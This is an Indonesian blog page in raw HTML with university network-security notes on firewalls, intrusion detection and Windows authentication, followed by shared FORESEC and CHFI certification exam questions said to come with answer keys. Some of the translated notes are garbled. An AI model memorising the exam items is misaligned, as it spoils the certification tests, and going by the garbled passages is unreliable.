situs<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Wingdings 2";"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Memberlakukan kebijakan keamanan organisasi<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="Default"> <span style="color: windowtext;">Firewall dapat diimplementasikan sebagai</span></div> <div class="Default"> <span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -18pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"><br /></span></span></div> <div class="Default"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -18pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="color: windowtext; text-indent: -18pt;">peralatan jaringan Dedicated (tampaknya ada tren yang berbeda terhadap peralatan)</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Hardware atau perangkat lunak dimasukkan ke dalam perangkat jaringan seperti router (yang terutama menjalankan tugas lain)</span></li> <li><span style="color: windowtext; text-indent: -18pt;">Software berjalan pada komputer tujuan umum</span></li> </ul> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Packet Filter <o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default" style="margin-left: 49.65pt; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Filter paket yang "low end" firewall <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;">- Dapat meningkatkan keamanan <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;">- Sangat cepat<o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Reliant on DestPort - that if the <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;">packet says TCP 25, it is assumed it is <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;">Simple Mail Transfer Protocol (SMTP). <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Data content passes through unchecked. <o:p></o:p></span></div> <div class="MsoNormal" style="margin-left: 1.0cm; text-indent: -1.0cm;"> <br /></div> <div class="MsoNormal" style="margin-left: 1.0cm; text-indent: -1.0cm;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 18.0pt; line-height: 115%;">Proxy or Application Gateway</span></div> <div class="MsoNormal" style="margin-left: 1.0cm; text-indent: -1.0cm;"> <span style="font-family: 'Wingdings 2'; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"><br /></span></span></div> <div class="MsoNormal" style="margin-left: 1.0cm; text-indent: -1.0cm;"> <span style="font-family: 'Wingdings 2'; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"><br /></span></span></div> <div class="MsoNormal" style="margin-left: 1.0cm; text-indent: -1.0cm;"> </div> <ul style="text-align: left;"> <li><span style="font-family: 'Wingdings 2'; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt; line-height: normal;"> </span></span><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">filter Packet cepat, tetapi mereka dapat tertipu, mereka perdagangan kecepatan untuk keamanan</span></li> <li><span style="font-family: 'Century Gothic', sans-serif; font-size: 12pt; line-height: 115%; text-indent: -21.3pt;">firewall proxy adalah di ujung spektrum. Di antara firewall, mereka umumnya adalah paling lambat dalam kinerja dan paling nyaman untuk mengelola, seperti ketika protokol baru belum didukung, namun, firewall proxy yang biasanya menyediakan keamanan terbaik.</span></li> </ul> <div class="Default"> <br /></div> <div class="Default"> <br /></div> <div align="center" class="MsoNormal" style="text-align: center;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 26.0pt; line-height: 115%; mso-bidi-font-weight: bold;">INTRUSION DETECTION SYSTEM<o:p></o:p></span></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin-bottom: 0.0001pt;"> <br /></div> <div class="MsoNormal" style="margin: 0cm 0cm 12pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt;"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Sebuah sistem deteksi intrusi (IDS) adalah sebuah perangkat atau aplikasi perangkat lunak yang memantau jaringan dan / atau sistem kegiatan untuk kegiatan berbahaya atau pelanggaran kebijakan dan menghasilkan laporan ke Stasiun Manajemen<o:p></o:p></span></div> <div class="MsoNormal" style="margin: 0cm 0cm 12pt 49.65pt; text-indent: -21.3pt;"> <span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Wingdings 2";"></span><span style="font-family: "Century Gothic","sans-serif"; font-size: 12.0pt; mso-bidi-font-family: "Century Gothic";">Sistem deteksi intrusi terutama difokuskan pada identifikasi insiden yang mungkin terjadi, penebangan informasi tentang mereka, dan pelaporan upaya<o:p></o:p></span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiduYgae-MyLGZ44utBpzF4Npma29H21iLB74IOffSzSmit36zt0e17P6KFxk7iSdLcYJH8idFReapORDPIVswQtZKExL793FXiAwIbPMcUg1rOKNUv1Uyan6KYjfZ-OMCK-AFMyr8FIaA/s1600/Untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiduYgae-MyLGZ44utBpzF4Npma29H21iLB74IOffSzSmit36zt0e17P6KFxk7iSdLcYJH8idFReapORDPIVswQtZKExL793FXiAwIbPMcUg1rOKNUv1Uyan6KYjfZ-OMCK-AFMyr8FIaA/s1600/Untitled.jpg" width="223" /></a></div> <div class="MsoNormal" style="margin: 0cm 0cm 0.0001pt 49.65pt; text-indent: -21.3pt;"> <br /></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Types <o:p></o:p></span></div> <div class="Default" style="margin-bottom: 9.15pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; text-indent: -21.3pt;"> <span style="color: windowtext;">Ada dua jenis utama IDS:<o:p></o:p></span></div> <div class="Default" style="margin-bottom: 9.15pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Sistem deteksi intrusi jaringan (NIDS): sebuah platform independen yang mengidentifikasi gangguan dengan memeriksa lalu lintas jaringan dan memonitor beberapa host. Sistem deteksi intrusi jaringan mendapatkan akses ke lalu lintas jaringan dengan menghubungkan ke jaringan hub, switch jaringan dikonfigurasi untuk port mirroring, atau sentuh jaringan.<o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Sistem deteksi intrusi berbasis host (HIDS): Ini terdiri dari agen pada host yang mengidentifikasi gangguan dengan menganalisis sistem panggilan, log aplikasi, modifikasi file sistem (binari, file password, database kemampuan, Access Control Lists, dll) dan kegiatan host lain dan negara.<o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Passive and/or reactive systems </span><span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;"><o:p></o:p></span></div> <div class="Default" style="margin-bottom: 10.05pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Dalam sistem pasif, sistem deteksi intrusi (IDS) sensor mendeteksi pelanggaran keamanan potensial, menyimpan informasi tersebut dan sinyal peringatan pada konsol dan atau pemilik.<o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt; text-indent: -21.3pt;"> <span style="color: windowtext; mso-bidi-font-family: "Wingdings 2";"></span><span style="color: windowtext;">Dalam sistem reaktif, juga dikenal sebagai sistem pencegahan intrusi (IPS), IPS auto-merespon aktivitas mencurigakan dengan mengatur ulang sambungan atau dengan memprogram ulang firewall untuk memblokir lalu lintas jaringan dari sumber berbahaya yang dicurigai. The IDPS Istilah ini umumnya digunakan di mana ini bisa terjadi secara otomatis atau atas perintah operator, sistem yang baik "mendeteksi" (alert) dan / atau "mencegah."</span></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">IPS vs IDS</span></div> <div class="Default"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; text-indent: -21.3pt;">Teknologi IPS dibedakan dari teknologi IDS oleh salah satu karakteristik: IPS teknologi dapat merespon ancaman terdeteksi dengan mencoba untuk mencegah berhasil.</span></li> <li><span style="text-indent: -18pt;">Tanda Tangan adalah Pola Yang Sesuai Artikel Baru ancaman dikenal.</span></li> </ul> <br /> <div class="Default" style="margin-left: 49.65pt;"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Signature-Based Detection </span><span style="color: windowtext; font-size: 18.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;"><o:p></o:p></span></div> <div class="Default" style="margin-bottom: 9.15pt; margin-left: 49.65pt; margin-right: 0cm; margin-top: 0cm; mso-list: l1 level1 lfo9; text-indent: -21.3pt;"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -21.3pt;">›<span style="font-family: 'Times New Roman'; font-size: 7pt;">  </span></span><span style="color: windowtext; text-indent: -21.3pt;">Tanda tangan adalah pola yang sesuai dengan ancaman dikenal.</span></li> <li><span style="color: windowtext; text-indent: -21.3pt;">Upaya telnet dengan username "root", yang merupakan pelanggaran dari sebuah organisasi "s kebijakan keamanan</span></li> <li><span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="color: windowtext; text-indent: -21.3pt;">Sebuah e-mail dengan subjek "gambar Gratis!" Dan nama file lampiran "freepics.exe", yang merupakan karakteristik dari bentuk yang dikenal malware</span></li> <li><span style="color: windowtext; font-family: 'Wingdings 2'; text-indent: -21.3pt;"><span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="color: windowtext; text-indent: -21.3pt;">Entri log sistem operasi dengan nilai kode status 645, yang menunjukkan bahwa host "s audit telah dinonaktifkan.</span></li> </ul> <div class="Default"> <span style="color: windowtext; font-size: 14.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Anomaly-Based Detection vs Signature-Based Detection</span></div> <div class="Default"> <span style="color: windowtext; text-indent: -21.3pt;"><br /></span></div> <div class="Default"> </div> <ul style="text-align: left;"> <li><span style="color: windowtext; text-indent: -21.3pt;">Manfaat utama dari metode pendeteksian berbasis anomali adalah bahwa mereka dapat menjadi sangat efektif dalam mendeteksi ancaman yang sebelumnya tidak diketahui.</span></li> <li><span style="color: windowtext; text-indent: -21.3pt;">Deteksi berbasis signature sangat efektif dalam mendeteksi ancaman dikenal tetapi sebagian besar tidak efektif dalam mendeteksi ancaman yang sebelumnya tidak diketahui, ancaman menyamar dengan menggunakan teknik penghindaran, dan banyak varian dari ancaman dikenal.</span></li> </ul> <br /> <div class="Default" style="margin-left: 49.65pt;"> <br /></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; font-size: 16.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;">Encrypted Networks <o:p></o:p></span></div> <div class="Default"> <span style="color: windowtext; font-size: 16.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi;"><br /></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext;"> Sensor NIDS tidak dapat menganalisis apa yang mereka tidak bisa membaca <o:p></o:p></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext;"> Penggunaan enkripsi untuk lalu lintas jaringan tumbuh <o:p></o:p></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext;"> Enkripsi dapat digunakan oleh penyerang untuk menyembunyikan lalu lintas mereka <o:p></o:p></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext;"> Lalu Lintas harus dibaca sebelum / setelah proses enkripsi <o:p></o:p></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext;"> NIDS dan HIDS dapat bekerja sama untuk mengatasi tantangan ini</span><span style="color: windowtext; font-size: 18.0pt;"><o:p></o:p></span></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <br /></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <br /></div> <div class="DefaultCxSpMiddle" style="margin-bottom: 7.85pt; mso-add-space: auto;"> <span style="color: windowtext; font-size: 18.0pt;">TCPWrappers Threat List</span><span style="color: windowtext; font-size: 18pt;"> </span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;"> serangan Outsider dari jaringan <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;"> serangan Outsider dari telepon <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;"> serangan Insider dari jaringan lokal <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;"> serangan Insider dari sistem lokal <o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <span style="color: windowtext;"> Serangan dari kode berbahaya<o:p></o:p></span></div> <div class="Default" style="margin-left: 49.65pt;"> <br /></div> <div class="Default"> <br /></div> <div class="Default"> <br /></div> <div align="center" class="Default" style="text-align: center;"> <span style="color: windowtext; font-size: 26.0pt; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;">Windows Security<o:p></o:p></span></div> <div align="center" class="Default" style="text-align: center;"> <br /></div> <div class="Default"> <span style="color: windowtext; mso-bidi-font-weight: bold;">Kerberos adalah protokol otentikasi jaringan komputer yang bekerja atas dasar "tiket" untuk memungkinkan node berkomunikasi melalui jaringan non-aman untuk membuktikan identitas mereka satu sama lain dengan cara yang aman. <o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default"> <span style="color: windowtext; mso-bidi-font-weight: bold;">Active Directory (AD) adalah layanan direktori yang dibuat oleh Microsoft untuk jaringan domain Windows.</span><span style="color: windowtext; mso-bidi-font-family: "Times New Roman"; mso-bidi-font-weight: bold; mso-bidi-theme-font: minor-bidi;"><o:p></o:p></span></div> <div class="Default"> <br /></div> <div class="Default" style="margin-left: 49.65pt;"> <br /></div> <div class="Default" style="margin-left: 49.65pt;"> <br /></div> <br /> <div class="Default"> <br /></div> </div>

Materi UAS SEMESTER 5 KEAMANAN JARINGAN

Web Communication and Security A Brief Introduction to Web Communications Hypertext Transfer Protocol Protokol HTTP adalah berori...

lengkapnya

Jawaban Ujian FORESEC Networking-Security-Exam Lvl 1

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwN4lk8LuSUuqeqlT_MOzvpF-9I7_trJFY3paHBT1utEkGgrwgOT3In8w9bBw6_WM-FZbA6GvHn7S-pkjPCWXn-EDVhCx7sPksFFwHpDYGXTvS2VWV6N3_AaFw_HOgscD4l4UKAzOl56o/s1600/foresec-binadarma1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwN4lk8LuSUuqeqlT_MOzvpF-9I7_trJFY3paHBT1utEkGgrwgOT3In8w9bBw6_WM-FZbA6GvHn7S-pkjPCWXn-EDVhCx7sPksFFwHpDYGXTvS2VWV6N3_AaFw_HOgscD4l4UKAzOl56o/s1600/foresec-binadarma1.jpg" width="222" /></a></div> <div style="-x-system-font: none; display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto;"> <br /></div> <div style="-x-system-font: none; display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto;"> <a href="http://www.scribd.com/doc/198804830/FORESEC-Networking-Security-Exam-Lvl-1" style="text-decoration: underline;" title="View FORESEC Networking-Security-Exam Lvl 1 on Scribd">FORESEC Networking-Security-Exam Lvl 1</a></div> <iframe class="scribd_iframe_embed" data-aspect-ratio="undefined" data-auto-height="false" frameborder="0" height="600" id="doc_34976" scrolling="no" src="//www.scribd.com/embeds/198804830/content?start_page=1&view_mode=scroll&show_recommendations=true" width="100%"></iframe></div>

Jawaban Ujian FORESEC Networking-Security-Exam Lvl 1

FORESEC Networking-Security-Exam Lvl 1

lengkapnya

Jawaban Ujian Foresec Computer Forensic Exam 2012

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkZOkHH29_jIeRe8DRZj4G3LoV68emfUPTp5xp4O26nVMMcJQnKUsDFvmtulTRUqcMngx_8Zqr9Q7CzeYeUFhiOjSUDpv8vwUcv5kg_kQ0ltpl3sCWr7gIsdgyyWpOA38HBAIw45k1BaM/s1600/foresec-binadarma1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkZOkHH29_jIeRe8DRZj4G3LoV68emfUPTp5xp4O26nVMMcJQnKUsDFvmtulTRUqcMngx_8Zqr9Q7CzeYeUFhiOjSUDpv8vwUcv5kg_kQ0ltpl3sCWr7gIsdgyyWpOA38HBAIw45k1BaM/s1600/foresec-binadarma1.jpg" width="222" /></a></div> <div style="-x-system-font: none; display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto;"> <br /></div> <div style="-x-system-font: none; display: block; font-family: Helvetica,Arial,Sans-serif; font-size-adjust: none; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin: 12px auto 6px auto;"> <a href="http://www.scribd.com/doc/198804766/Computer-Forensic-Exam-2012" style="text-decoration: underline;" title="View Computer Forensic Exam 2012 on Scribd">Computer Forensic Exam 2012</a></div> <iframe class="scribd_iframe_embed" data-aspect-ratio="undefined" data-auto-height="false" frameborder="0" height="600" id="doc_53209" scrolling="no" src="//www.scribd.com/embeds/198804766/content?start_page=1&view_mode=scroll&show_recommendations=true" width="100%"></iframe></div>

Jawaban Ujian Foresec Computer Forensic Exam 2012

Computer Forensic Exam 2012

lengkapnya

Jawaban FORESEC information security level 4 | 312-49 Computer Hacking Forensic Investigator 2011

<div dir="ltr" style="text-align: left;" trbidi="on"> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-SaNOFUElYoicG_TJhV7Og_d4PIrOmw6ALX_TNq6APXOYR0yGQU_AUeRqwhP4W3gtpSuAHN4C2cOL7DG54mtAqjl4eIKPIk7ONSBoKNdg-PokuGM2PpNLD2CDTVDWoSZIbNpJtKQmyk/s1600/download+%25281%2529.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-SaNOFUElYoicG_TJhV7Og_d4PIrOmw6ALX_TNq6APXOYR0yGQU_AUeRqwhP4W3gtpSuAHN4C2cOL7DG54mtAqjl4eIKPIk7ONSBoKNdg-PokuGM2PpNLD2CDTVDWoSZIbNpJtKQmyk/s1600/download+%25281%2529.jpg" /></a><br /> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;">Post perdana di tahun 2014, ane mau share soal-soal test FORESEC information security level 4.  Buat temen-temen seperjuangan monggo di donloat, lumayan buat bahan. ini udah + kunci jawaban. :).  Sekilas info nih gan, di pdf ini ada 200an soal, ini hasil sunting dari sumber aiotestking.com. Soalnya di sumbernya itu sistemya online jadi cuman satu satu keliatan, ini ane pdfin biar gampag aja plajarinya :D.</span><br /> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="background-color: white; font-family: arial, Verdana, tahoma, sans-serif; font-size: 12px;"><br /></span> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">evidence from this network?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. create a compressed copy of the file with DoubleSpace</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. create a sparse data copy of a folder or file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. make a bit-stream disk-to-image file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. make a bit-stream disk-to-disk file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">9. You are working for a large clothing manufacturer as a computer forensics investigator and are called in to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigate an unusual case of an employee possibly stealing clothing designs from the company and selling</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">them under a different brand name for a different company. What you discover during the course of the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigation is that the clothing designs are actually original products of the employee and the company</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">has no policy against an employee selling his own designs on his own time. The only thing that you can</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">that of the company with only the wording in the graphic being different. What area of the law is the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">employee violating?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. trademark law</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. copyright law</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. printright law</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. brandmark law</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">10. What file structure database would you expect to find on floppy disks?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. NTFS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. FAT32</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. FAT16</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. FAT12</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">11. What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">router with many open connections simultaneously so that all the hosts behind the router are effectively</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">disabled?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. digital attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. denial of service</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. physical attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. ARP redirect</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">12. When examining a file with a Hex Editor, what space does the file header occupy?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the last several bytes of the file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the first several bytes of the file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. none, file headers are contained in the FAT</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. one byte at the beginning of the file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">13. In the context of file deletion process, which of the following statement holds true?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. When files are deleted, the data is overwritten and the cluster marked as available</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The longer a disk is inuse, the less likely it is that deleted files will be overwritten</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. While booting, the machine may create temporary files that can delete evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Secure delete programs work by completely overwriting the file in one go</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">14. A suspect is accused of violating the acceptable use of computing resources, as he has visited adult</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">has removed any images he might have downloadeD. What can the investigator do to prove the violation?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Choose the most feasible option.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Image the disk and try to recover deleted files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Seek the help of co-workers who are eye-witnesses</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Check the Windows registry for connection data (You may or may not recover)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span 